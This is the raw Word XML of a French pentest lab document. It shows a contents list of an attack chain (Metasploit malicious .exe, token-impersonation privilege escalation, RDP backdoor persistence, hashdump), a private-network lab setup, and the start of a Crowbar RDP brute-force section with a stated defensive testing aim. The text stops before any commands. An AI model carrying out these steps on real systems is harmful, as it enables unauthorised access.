        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Backdoor</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc123116330 \h </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">10</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="986"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="880" w:leader="none"/>
          <w:tab w:val="right" w:pos="9060" w:leader="dot"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:smallCaps w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4.1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:smallCaps w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Introduction</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc123116331 \h </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">10</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4.1.1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Qu’est-ce que METASPLOIT ?</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc123116332 \h </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">10</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4.1.2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Qu’est-ce qu’un Backdoor</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc123116333 \h </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">10</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="986"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="880" w:leader="none"/>
          <w:tab w:val="right" w:pos="9060" w:leader="dot"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:smallCaps w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4.2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:smallCaps w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Procédure</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc123116334 \h </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">11</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4.2.1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Création d’un .exe malveillant</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc123116335 \h </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">11</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4.2.2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Déporter le payload sur WS2016</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc123116336 \h </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">13</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4.2.3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Exécution du payload</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc123116337 \h </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">16</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4.2.4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Escalade de privilèges « jeton d’imitation »</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc123116338 \h </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">18</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4.2.5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Persistance « Backdoor »</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc123116339 \h </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">20</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4.2.6</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Méthode « RDP Backdoor » :</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc123116340 \h </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">20</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="987"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="1100" w:leader="none"/>
          <w:tab w:val="right" w:pos="9060" w:leader="dot"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4.2.7</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">HASDUMP</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc123116341 \h </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">23</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="990"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs/>
          <w:caps/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs/>
          <w:caps/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>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990"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs/>
          <w:caps/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs/>
          <w:caps/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
        </w:rPr>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1045"/>
      </w:pPr>
      <w:r/>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:r/>
      <w:bookmarkEnd w:id="0"/>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1045"/>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991"/>
      </w:pPr>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1036"/>
      </w:pPr>
      <w:r/>
      <w:bookmarkStart w:id="1" w:name="_Toc123116321"/>
      <w:r>
        <w:t xml:space="preserve">Introduction</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="991"/>
      </w:pPr>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1045"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Les postes de travail des utilisateurs sont des composants critiques du système d’information et doivent être protégées en conséquence.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1045"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">La compromission d’un poste client peut </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">donner</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> accès au réseau interne </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">d’une entreprise</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">La plus grande faille en informatique reste à ce jours la faille humaine.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1045"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Il existe plusieurs type d’attaque pour s’introduire sur un poste de </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">travail</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, les plus connus sont :</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1045"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Le Brute force RDP</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1045"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Le Backdoor</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1036"/>
        <w:ind w:left="360" w:hanging="360"/>
      </w:pPr>
      <w:r/>
      <w:bookmarkStart w:id="2" w:name="_Toc122249378"/>
      <w:r/>
      <w:bookmarkStart w:id="3" w:name="_Toc123116322"/>
      <w:r>
        <w:t xml:space="preserve">Prérequis</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
      <w:r/>
      <w:bookmarkEnd w:id="3"/>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Pour ce faire, nous aurons besoins :</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1061"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">1 Windows serveur 2016</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1061"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">1 kali Linux version 2022.4a</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1061"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Ubuntu 20.04</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Ces 3 machines devront être dans le même sous-réseau, en Nat vmnet8 :</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1061"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Adresse réseau :192.168.240.0/24</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1061"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Passerelle : 192.168.240.254</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1061"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">WS2016 : 192.168.240.240 avec un domaine FORMATION.local</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1061"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Kali : 192.168.240.140</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1061"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Ubuntu 20.04 :192.168.240.20</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="991"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="991"/>
      </w:pPr>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="991"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:inline xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" distT="0" distB="0" distL="0" distR="0">
                <wp:extent cx="3306258" cy="2676741"/>
                <wp:effectExtent l="0" t="0" r="889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6"/>
                        <a:stretch/>
                      </pic:blipFill>
                      <pic:spPr bwMode="auto">
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="3306258" cy="2676741"/>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60.3pt;height:210.8pt;mso-wrap-distance-left:0.0pt;mso-wrap-distance-top:0.0pt;mso-wrap-distance-right:0.0pt;mso-wrap-distance-bottom:0.0pt;" stroked="false">
                <v:path textboxrect="0,0,0,0"/>
                <v:imagedata r:id="rId16" o:title=""/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="991"/>
      </w:pPr>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="991"/>
      </w:pPr>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1036"/>
      </w:pPr>
      <w:r/>
      <w:bookmarkStart w:id="4" w:name="_Toc123116323"/>
      <w:r>
        <w:t xml:space="preserve">Le Brut force RDP</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1045"/>
      </w:pPr>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1039"/>
      </w:pPr>
      <w:r/>
      <w:bookmarkStart w:id="5" w:name="_Toc123116324"/>
      <w:r>
        <w:t xml:space="preserve">Introduction</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1045"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Dans ce TP, nous allons apprendre à réaliser une attaque par brute force sur le service RDP d'une machine Windows serveurs 2016 en utilisant l'outil </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Crowbar</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1045"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Cette pratique est intéressante dans le cadre d'un pentest (test d'intrusion), mais également pour tester soi-même la sécurité d'une ou plusieurs machines. </w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1045"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Effectuer une attaque par brute force RDP sur un serveur est un bon moyen pour vérifier :</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1045"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Que le serveur ciblé est capable de bannir l'adresse IP source à l'origine de l'attaque au bout d'un certain nombre de tentatives en échecs</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1045"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Que le serveur ciblé génère des logs correspondants à ces tentatives</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1045"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Que le compte utilisateur utilisé, s'il existe réellement, sera verrouillé au bout d'un certain nombre de tentatives en échecs</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1045"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Autrement dit, on va attaquer l'accès RDP de notre propre serveur pour tester les sécurités en place.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1045"/>
      </w:pPr>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1039"/>
      </w:pPr>
      <w:r/>
      <w:bookmarkStart w:id="6" w:name="_Toc123116325"/>
      <w:r>
        <w:t xml:space="preserve">Les Outils</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Crowbar est un outil gratuit développé en Python qui va permettre de réaliser des attaques de type "brute force" sur une cible, et sur un protocole spécifique. Cet outil est compatible avec les protocoles suivants : </w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Openvpn</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">RDP (avec support du NLA) </w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">SSH</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">VNC</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="57"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Pour ce TP, on va s'intéresser au cas de figure du RDP même si l'on pourrait l'utiliser sur d'autres services.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Le terme "crowbar" signifie "pied de biche" en français : cette traduction permet de mieux comprendre pourquoi les développeurs ont choisi ce nom pour cet outil compte tenu de ses fonctionnalités.</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r/>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1039"/>
      </w:pPr>
      <w:r/>
      <w:bookmarkStart w:id="7" w:name="_Toc121847804"/>
      <w:r/>
      <w:bookmarkStart w:id="8" w:name="_Toc123116326"/>
      <w:r>
        <w:t xml:space="preserve">Procédure</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
      <w:r/>
      <w:bookmarkEnd w:id="8"/>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
